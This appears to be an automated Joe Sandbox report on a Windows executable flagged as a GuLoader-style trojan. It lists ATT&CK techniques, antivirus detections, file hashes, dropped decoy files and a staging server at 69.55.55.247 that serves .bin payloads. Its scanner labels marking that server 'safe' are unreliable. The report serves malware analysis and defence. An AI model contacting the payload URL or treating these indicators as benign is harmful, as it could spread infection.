Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	24 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
qNNwDeb9BY.exe	74%	Virustotal		Browse
qNNwDeb9BY.exe	66%	ReversingLabs	Win32.Trojan.Leonem
qNNwDeb9BY.exe	100%	Avira	DR/AVI.Agent.yqazt

Source	Detection	Scanner	Label
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bina	0%	Avira URL Cloud	safe
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin	0%	Avira URL Cloud	safe
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.binv	0%	Avira URL Cloud	safe
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.binB	0%	Avira URL Cloud	safe
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bink	0%	Avira URL Cloud	safe
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin_	0%	Avira URL Cloud	safe
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin%	0%	Avira URL Cloud	safe
http://www.microsoft.M	0%	Avira URL Cloud	safe
http://www.microsoft.MSFT_PrinterPort.format.ps1xml	0%	Avira URL Cloud	safe
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin=	0%	Avira URL Cloud	safe
http://crl.v	0%	Avira URL Cloud	safe

Name	Malicious	Antivirus Detection	Reputation
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin%	msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bina	msiexec.exe, 0000000B.00000002.2123450727.000000000842D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin_	msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.MSFT_PrinterPort.format.ps1xml	powershell.exe, 00000001.00000002.1435233565.0000000008D29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false		high
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.binv	msiexec.exe, 0000000B.00000002.2123450727.000000000842D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000004.00000002.2119475230.0000022FA1E00000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error...	qNNwDeb9BY.exe, 00000000.00000002.889236194.0000000000408000.00000002.00000001.01000000.00000003.sdmp, qNNwDeb9BY.exe, 00000000.00000000.863365711.0000000000408000.00000002.00000001.01000000.00000003.sdmp	false		high
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bink	msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	false		high
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.binB	msiexec.exe, 0000000B.00000002.2123450727.000000000841A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micro	powershell.exe, 00000001.00000002.1435233565.0000000008D29000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/Prod-C:	svchost.exe, 00000004.00000003.1203413979.0000022FA2033000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.M	powershell.exe, 00000001.00000002.1435233565.0000000008D29000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://69.55.55.247/UXSkysDzBMaMrVXGKY103.bin=	msiexec.exe, 0000000B.00000002.2123450727.00000000083EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lBGr	powershell.exe, 00000001.00000002.1425935127.00000000053C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000001.00000002.1425935127.0000000005517000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2-C:	svchost.exe, 00000004.00000003.1203413979.0000022FA2000000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1429434816.0000000006426000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1425935127.00000000053C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.v	svchost.exe, 00000004.00000002.2119475230.0000022FA1E00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
69.55.55.247	unknown	United States		14061	DIGITALOCEAN-ASNUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1633525
Start date and time:	2025-03-10 12:51:49 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	qNNwDeb9BY.exe renamed because original name is a hash value
Original Sample Name:	a5e7b9b7461241382bcc88a1fa2b2a6ad712047709de85ffbc58831318eb4d14.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/29@0/2
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 90% Number of executed functions: 73 Number of non-executed functions: 49
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.199.214.10, 52.149.20.212
Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6328 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
07:52:46	API Interceptor	38x Sleep call for process: powershell.exe modified
07:53:17	API Interceptor	2x Sleep call for process: svchost.exe modified
07:54:06	API Interceptor	2x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
69.55.55.247	Commercial Bank of Dubai Credit Advise.exe	Get hash	malicious	GuLoader	Browse	69.55.55.247/Bkuidh225.bin
	Commercial Bank of Dubai Credit Advise.exe	Get hash	malicious	GuLoader	Browse	69.55.55.247/Bkuidh225.bin
	Turkiye Is Bankasi Payment Copy 21.02.2025.exe	Get hash	malicious	Remcos, GuLoader	Browse	69.55.55.247/mMAGCGPhWPAKCymyE11.bin

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DIGITALOCEAN-ASNUS	demande12_pdf.html	Get hash	malicious	Unknown	Browse	139.59.252.230
	LRQ746.dll	Get hash	malicious	Unknown	Browse	188.166.28.204
	zerarm.elf	Get hash	malicious	Unknown	Browse	159.89.101.70
	zerarm5.elf	Get hash	malicious	Unknown	Browse	159.89.101.70
	zermips.elf	Get hash	malicious	Unknown	Browse	159.89.101.70
	zerx86.elf	Get hash	malicious	Unknown	Browse	64.227.79.152
	zerspc.elf	Get hash	malicious	Unknown	Browse	159.89.101.70
	zerppc.elf	Get hash	malicious	Unknown	Browse	64.227.79.152
	zermpsl.elf	Get hash	malicious	Unknown	Browse	159.89.101.70
	zerm68k.elf	Get hash	malicious	Unknown	Browse	64.227.79.152

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.49322734340227
Encrypted:	false
SSDEEP:	1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1Ztad:cJhXC9lHmutpJyiRDeJ/aUKrDgnmj
MD5:	8A825F2688301C8871FD5E24DC1A5D20
SHA1:	218C7C94F24C1C88D7687591D4B611F2998BEF77
SHA-256:	6A1307A1B17669FC3BED1209296ADA4B0AF504B433053F40DCD48F8ED7228E61
SHA-512:	965065A6FF74975BA8F11085079DFD891EA16C2FB0229A9F6F3B836E3501A0D86CE82571510E2A4605EE24742DB4F30F808F71A991B452F89B4239D9DF00FAC4
Malicious:	false
Reputation:	low
Preview:	^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0xc75f8d39, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7217057209338511
Encrypted:	false
SSDEEP:	1536:TSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:TazaNvFv8V2UW/DLzN/w4wZi
MD5:	04797E29FCFCB7B727C8423945D02566
SHA1:	D2FCC65AEB56DE9F14AFCA9DC20ECBBD5693F408
SHA-256:	A4F918B1716A50EF149FA51CBC33221CD909CA894DEFD4B83FBD5A3C66572C2F
SHA-512:	B5C73A4CF790E9E1549C946013C3EDA3EEA458A1E0198BA53CFA53CD5B3FBCE9637161A96619779979FCCFCB4D1C8485A2247A5143D2A3D63FF68E7D329162F4
Malicious:	false
Reputation:	low
Preview:	._.9... ...............X\...;...{......................p.D..........{}..5...}..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{.......................................5...}.;.................z...5...}...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08102570959465667
Encrypted:	false
SSDEEP:	3:nxm/8YeD7vmYSw/fgsCrZClW/tBA+d//all+SHY/Xl+/rQLve:xW8zD7v4wfgs3Gf/GAS4M
MD5:	3323EB29176D61515BA9ACB708B8D1F3
SHA1:	58772C959FA504BED311099F94DBB7E861FBCF57
SHA-256:	17EBFD1FCE99B66B47CAA413C12D0A1A0B25B0275B03EF12CA0DBA8C9E540D58
SHA-512:	1BE2252D08FFB32193B18E2FCE43A5D8476F08A6E494AFCD27F1BFDE69A7AFF2C683D1F5B25938D9778E1A9E3AA82FA0E40A21268E880A53E3CE7DFE98C777AF
Malicious:	false
Reputation:	low
Preview:	'..R.....................................;...{...5...}.......{}..............{}......{}.vv_Q.....{}..................z...5...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnoh4m5h.d32.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_womdpb0l.zr3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtxdd4of.vfs.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsi4ch1w.1z4.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Albanernes135.txt

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	343
Entropy (8bit):	4.411576343807431
Encrypted:	false
SSDEEP:	6:cmqNzNGibLAMJXDGgb5KqR083JfLNHMXRByjHFLTfEoLm9C1Au5ZxnTuHAv:I3bLAMtGgbbycj2XRIlLTfBLmcFTuS
MD5:	5D15EEE75CB220F7CCBD006C1F726E1A
SHA1:	21DE1F4C26EA089AF948CFB7272F5B58AD88F7E7
SHA-256:	FD91EE0C3507D77657EFDE20B0A264DE38B458F9439F9528BB8A3DD87647D8D7
SHA-512:	0307246EDB79257D6C101900FD313CC3110E0DF520093C3189ED3B858605FAB35B2F21DF19B31E67756CABA9A21BB18C37D304C0A7B30A356E0E6E623ABD6B3D
Malicious:	false
Preview:	[flom telekinesis]..driftsproblemer retiling chyometer.Tillidskvindernes kannevasen mucopus cosmonautically........preinvestigated subdrill aminoazo unenameled skraldgassen lambaste.Gonorriv haarrdderne diner obstructively imparling..;mannopyranosyl nazi mattedness admirableness lokalplanret.Medmenneskeliges troldnders ejendomsforbeholdene..

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Bassianus17.jpg

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 372x180, components 3
Category:	dropped
Size (bytes):	19857
Entropy (8bit):	7.970137664138796
Encrypted:	false
SSDEEP:	384:RAurUSHXCWQb86hDxv/Fkel8xqw6Gkx5KcfmC3TQuU2OuwqAUGQJeOzv:RscMFF8FP/cfmCsu6DQDzv
MD5:	136872D2A127B0026A6EB4D5B5657691
SHA1:	03EEE83C3846397A8BE3EBD91B9B6FF1D9B53300
SHA-256:	A0FF4E15764DF34888FF4C928546953B8E8535D7B5D5D62D2399BAF86297B9D5
SHA-512:	E6F24416EBFDB4145668FE632647AB57C541C57B4F2A018569793E2AC8509B5E71F5353AF5B412A6217CDEA4205508750B01EE973EC48430BCEC41F3E5D5DBB7
Malicious:	false
Preview:	......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222........t.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..T5....iq.\.......a.jd......~ _.l.D.yI.........'.ta......s..O.=.v..d..v.P1.... _i.~]....G#!..j...5..K......t.X2.oP{.\o.~...J..7........\..;.i.w..'x.k.zg..U...2....ky8p=G....I.... ..#.....#T......w...."...........`4..H..X.Et.TpV...<..^..dhnP.j.c.....+..\|.uf.dW....T.&.`}.3._EO...,N..1].....x....b...N..!.........[F},g..:.!..#x..am..#qoR;V.'....6....N.~..O.iZ.H.

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Brandsikreste138.mal

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	data
Category:	dropped
Size (bytes):	90704
Entropy (8bit):	1.2560427856209115
Encrypted:	false
SSDEEP:	384:eNWcvM6KJNhPxTDf3YTmapIyzQx/PEvhRMS547TELD5XywWYHdQT+0z11Cc6:uW7/fctPM84glW//Cb
MD5:	211FD2FEE9F6E3CCDE1D3AE53B0ABBD3
SHA1:	3F3837E46A1C19ED44B0C7BEF30ED80A78A17164
SHA-256:	FCAC62C1459660982A93EBA966F79313B52F35D176BC6AB4A440FBEBEFC4936D
SHA-512:	AAADC65B05EC88E41E13B5CEDA27B40236566B8E42EF383196F0C7418CA65FBB5D72F6F0EDBE607D72402852298DB2B958A4E5FA553C5C950D7E03664D34A809
Malicious:	false
Preview:	............c..............................................m................................................{............0...a................................ .................R.......................\.........................0.................................}...."...............................................................q......................4................................w................................L.......................................R...~.....................................................................z.....j.X................q...........................%..................0...................................X....................r........................................................................T......4..........................=..g....p...$....................................(.........................x.......2...........................................................................................................................

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Diddles\rigsraadsslgtens.spr

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	data
Category:	dropped
Size (bytes):	454914
Entropy (8bit):	1.2557247594847223
Encrypted:	false
SSDEEP:	1536:WSp0JuZCmomzus5lApq8L96ij14xUsFKmjHYj/9D:9mJV9qd4pLwij14GsFKmTYD9D
MD5:	F91054039BD475F642527365C7884A23
SHA1:	CEF2838CF0E7BFAD85FCFC7FD45E2F7B677E4A48
SHA-256:	13CD36916BC78505F9BA5BF0F5911D35EA96D6ADEFAC4535EF84CA18EAD915DD
SHA-512:	4AD2CBD5DA8890AFC3379CCE2F1FBFDF8F8FDF801C5A741467DB0D90633ACEDA5240DF858772DC72B762696E76BBF70A28FD728F298B278102A70D688C145058
Malicious:	false
Preview:	...............................................................C................F......................F........................................................s.............X...........!..o..............................................................NF...................]....................................................................................................}.....i.....d......................#.......................................................c.....................................................................Z...........M.=......T.....................................0...........................h..........................................................(..0r.......................................................................................................................T;..............a...................b............y....K......................I..................L.........................................................................................p.......)

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Diddles\sanpoil.ini

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	882
Entropy (8bit):	4.382388724239625
Encrypted:	false
SSDEEP:	24:eWaK4D6jEw+l0xjDgQPkzbuKc2Vfikh+G/xqqPa:eW94Gj80tPkzy8fL9ZDa
MD5:	A3439B7E81DA7150BAA98D39CC42462E
SHA1:	DD17812D4BB2AAC514F0193D7093F67709CA8F42
SHA-256:	E6C20D52DDCCDA0306463990DC73C4595C3BAABFBED48961D45DDBF95C2BF422
SHA-512:	5262EC734D9C783E06405D0C3F62189D920CA3FF9CDB871709C7DB3F9329FDE1A67A7643D418483E633D9C607AB983E948A7518877201C84CF53D50431CDFB8B
Malicious:	false
Preview:	;thecata subuliform reelen kniplede ghostwriter.Whaly tyverisikredes buffalofishes lydbaandets hefteplaster..kuttab documentale lickerous hustankens photoptometer hebrew magyars.Witnessing dismantling pacificerings codicillary centrarchid mystifier velr..gnotobiology tekstilers stentrykker fejespaanets bavnens paradoksaliteten skriverkontoret brevveksledes rakettrinnet,svingturenes incudostapedial barduners efterspillet despairful skatteudvalget safirblaa fuldblods srbehandlede inconceivableness vatful..[rdtjrns sangundervisningerne]..dyrefabler strandvejen epagoge sturley pullulated dormant retroplacental myringotomy susannas,computerejernes pickaninny guldbarrer fjeligeres zoophism strkningen destabilisering familietraditioner..;stedvis finpudsnings guaharibo nationaldragterne drunkenwise.Checkidentitetskortets evanesces unemployed pseudoviperously fuppen landesorgs..

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Diddles\vilars.txt

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	4.383462478538008
Encrypted:	false
SSDEEP:	12:tcCaZV2py7LYCqEae6jSCTjgTKAvUg4n+PkAMosvUzy:tcnV2p25qBvTMK7+PkHoOUzy
MD5:	8DF155373EF0D59125B21B4552CEA224
SHA1:	B7B1BA1DEA4C2BDB515B4CBD402D948D2A5A1E1F
SHA-256:	350C26A5919AE618ED1E92AFF78D03167AE599DC3A283F35396346EA1E835E31
SHA-512:	65197DE7B76FA13BFDB17FA1C965EB1F0618D36830FDEC4E266D7E57085D08E06E7A2570A2ED86C3C3CFD2DCB645A704EB902D888DDE9F7F724C63407091BE19
Malicious:	false
Preview:	capitulatory nominature saligste telescopes.Adapteren volstead leatherfishes incitamenter trykimprgnering..posekikkeris patronizables uafviseliges remanence aflejredes demonstrationsmodellen pjkkeriet febrifuge,multilink unconjugal balky immaterielt tiggerbrevenes skulis........;portrayer forhandlerpris trissevrkers postposit tandende nodebladene,underdelinger fictionalize comforts faradized..uncountermanded kommandoposter divinize sldefarter commentary.Gearkassens bejesuit snildeste ramslag........

C:\Users\user\AppData\Local\Temp\majolicas\protonemata\operationsvrelser\Diddles\wastine.jpg

Download File

Process:	C:\Users\user\Desktop\qNNwDeb9BY.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 576x425, components 3
Category:	dropped
Size (bytes):	43820
Entropy (8bit):	7.96415925163756
Encrypted:	false
SSDEEP:	768:mHzVkORxtwW3i3LW0Q9h89q33gOrV9Ql26lT532mgu1j9wKWhxB8qXTryUS+s+K:mHpk6jl7M9GZr/Ql2mTN2k5wK6cJP
MD5:	0657B0F87BEB3131E62DF692E731B4B6
SHA1:	6E37E1C49329E19F94AD497DA5E85DE3C820D4BA
SHA-256:	8FF3B361FB83B318275F101362579FDBFA4DCE71BD955BF9EE1DCFEA55E24A19
SHA-512:	7177CB2938904D28F7F59D99117C30C031019E34A40B2800D7BCA619B64A1E2099BF0D6EF9B12133D71AAE37623E02530E2C8010A5143BABE0C2230F45014E07
Malicious:	false
